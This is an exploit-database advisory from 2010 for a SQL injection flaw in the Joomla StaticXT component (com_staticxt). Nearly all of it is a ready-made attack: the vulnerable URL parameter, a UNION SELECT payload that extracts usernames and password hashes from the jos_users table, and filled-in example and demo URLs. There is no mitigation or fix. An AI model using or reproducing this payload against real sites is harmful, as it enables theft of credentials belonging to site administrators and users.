Joomla! Component StaticXT – SQL Injection

  • 作者: Palyo34 & KroNicKq
    日期: 2010-07-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14395/
  • ===================================================
    Joomla Component (com_staticxt) SQL Injection Vulnerability
    ===================================================
    
    Author : Palyo34 & KroNicKq
    
    Homepage : http://www.1923turk.com
    
    ===================================================
    
    
    [+] Vulnerable File :
    
    
    http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]
    
    
    [+] ExploiT :
    
    union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
    
    jos_users--
    
    
    [+] G00gle Dork : :S
    
    
    [+] Example :
    
    http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
    
    
    [+] Demo :
    
    http://www.site.com/index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
    
    
    ===================================================
    ...:: Onurlu Olmak Bir Ömür Sürer Artistlik Ýse One Minute ::...
    ===================================================
    
    Greetz : 1923Turk All Users